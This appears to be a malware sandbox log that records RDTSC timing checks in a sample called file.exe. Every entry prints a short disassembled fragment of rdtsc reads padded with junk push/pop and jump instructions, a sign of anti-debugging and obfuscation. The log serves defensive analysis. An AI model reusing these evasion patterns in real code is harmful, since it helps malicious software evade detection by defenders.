Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D7FEC second address: 8D8019 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A86Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007FA67C81A881h 0x00000011 jmp 00007FA67C81A875h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D8019 second address: 8D8059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA67D0802A3h 0x0000000d jnc 00007FA67D0802B5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D8059 second address: 8D805E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D805E second address: 8D8066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D824B second address: 8D8251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E49CF second address: 8E49EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67D0802A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E49EC second address: 8E49F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2DE1 second address: 8E2E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA67D0802A4h 0x00000009 jmp 00007FA67D08029Ch 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2E08 second address: 8E2E0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2E0D second address: 8E2E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FA67D0802A2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2E27 second address: 8E2E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FA67C81A86Eh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007FA67C81A866h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2E47 second address: 8E2E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2E4B second address: 8E2E6A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA67C81A875h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E3268 second address: 8E326C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E326C second address: 8E3272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E3272 second address: 8E327C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E327C second address: 8E3282 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E34E8 second address: 8E34F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E365F second address: 8E3663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E3A21 second address: 8E3A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA67D080296h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FA67D080296h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E3A36 second address: 8E3A3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E3A3A second address: 8E3A3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EBDEA second address: 8EBDEF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F825E second address: 8F827E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA67D0802A8h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F827E second address: 8F8284 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F8284 second address: 8F828A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90AEF0 second address: 90AEF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 910A5E second address: 910A97 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007FA67D0802A1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FA67D0802A7h 0x00000010 push eax 0x00000011 jnp 00007FA67D080296h 0x00000017 pop eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9151F1 second address: 9151FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA67C81A866h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9198AE second address: 9198C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FA67D080296h 0x0000000a jns 00007FA67D080296h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9198C5 second address: 9198CF instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA67C81A866h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9199D9 second address: 9199E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jng 00007FA67D080296h 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9199E9 second address: 9199F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9199F2 second address: 9199F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 919B54 second address: 919B5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 919B5A second address: 919B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 919B5E second address: 919B76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A874h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91AB3A second address: 91AB42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91DBE9 second address: 91DC0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FA67C81A874h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91DC0A second address: 91DC16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007FA67D080296h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91DC16 second address: 91DC1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 931861 second address: 931865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 933246 second address: 93324C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93324C second address: 933250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 933250 second address: 933265 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA67C81A86Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9330C5 second address: 9330EB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA67D080296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FA67D0802A9h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 941074 second address: 941078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95917C second address: 9591C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67D0802A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FA67D0802A3h 0x0000000f jo 00007FA67D080296h 0x00000015 jmp 00007FA67D0802A0h 0x0000001a popad 0x0000001b pop ecx 0x0000001c pushad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9591C0 second address: 9591C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9591C8 second address: 9591ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA67D0802A4h 0x0000000a push edx 0x0000000b jg 00007FA67D080296h 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9591ED second address: 9591F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 959431 second address: 959436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95984E second address: 95986C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA67C81A877h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9599CA second address: 9599FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA67D0802A8h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FA67D0802A4h 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9599FF second address: 959A09 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA67C81A87Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 959A09 second address: 959A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA67D08029Fh 0x00000009 pushad 0x0000000a jbe 00007FA67D080296h 0x00000010 pushad 0x00000011 popad 0x00000012 jbe 00007FA67D080296h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b jc 00007FA67D0802D1h 0x00000021 jbe 00007FA67D0802B5h 0x00000027 jmp 00007FA67D08029Eh 0x0000002c jmp 00007FA67D0802A1h 0x00000031 pushad 0x00000032 jmp 00007FA67D08029Eh 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 959CFC second address: 959D0A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA67C81A866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 959D0A second address: 959D0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95B6AA second address: 95B6CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 jnl 00007FA67C81A872h 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007FA67C81A866h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95B6CE second address: 95B6D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95B6D2 second address: 95B6DF instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA67C81A866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 95F7B6 second address: 95F7FC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edx, dword ptr [ebp+122D390Ch] 0x00000010 push 00000004h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FA67D080298h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov dl, 4Ah 0x0000002e mov dword ptr [ebp+1244A03Ah], edx 0x00000034 push D96655D0h 0x00000039 push eax 0x0000003a push edx 0x0000003b push ebx 0x0000003c pushad 0x0000003d popad 0x0000003e pop ebx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96133A second address: 96133E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96133E second address: 961342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 961342 second address: 96134C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96134C second address: 961356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA67D080296h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 961356 second address: 96135E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 96135E second address: 96136F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA67D08029Ch 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 960F08 second address: 960F11 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 960F11 second address: 960F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 jmp 00007FA67D0802A1h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA67D0802A8h 0x00000015 jne 00007FA67D080296h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A902B3 second address: 4A902E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 0Dh 0x00000005 mov di, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FA67C81A872h 0x00000011 push eax 0x00000012 pushad 0x00000013 movsx edi, cx 0x00000016 movzx ecx, di 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A902E1 second address: 4A902E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A902E5 second address: 4A902EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70EBC second address: 4A70EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70EC0 second address: 4A70EC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70EC4 second address: 4A70ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0539 second address: 4AC0543 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 5AB59A49h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0543 second address: 4AC0578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FA67D0802A2h 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA67D0802A7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4AC0578 second address: 4AC057D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A500A0 second address: 4A500A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A500A4 second address: 4A500AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A500AA second address: 4A500F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, cl 0x00000005 push edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ebx, 70853076h 0x00000013 pushfd 0x00000014 jmp 00007FA67D0802A7h 0x00000019 sub ecx, 6D16F0FEh 0x0000001f jmp 00007FA67D0802A9h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A500F6 second address: 4A50122 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007FA67C81A86Eh 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50122 second address: 4A50128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50128 second address: 4A50139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dh, al 0x00000007 popad 0x00000008 push dword ptr [ebp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50139 second address: 4A5013D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A5013D second address: 4A50141 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50141 second address: 4A50147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A50147 second address: 4A5014D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A5014D second address: 4A50151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A501F5 second address: 4A501F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A501F9 second address: 4A501FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70C31 second address: 4A70C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70C36 second address: 4A70C3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70C3C second address: 4A70C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70C40 second address: 4A70C78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67D0802A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA67D0802A7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70C78 second address: 4A70CA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov si, DA53h 0x00000010 mov edx, esi 0x00000012 popad 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70CA6 second address: 4A70CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A70CAA second address: 4A70CC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA67C81A873h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
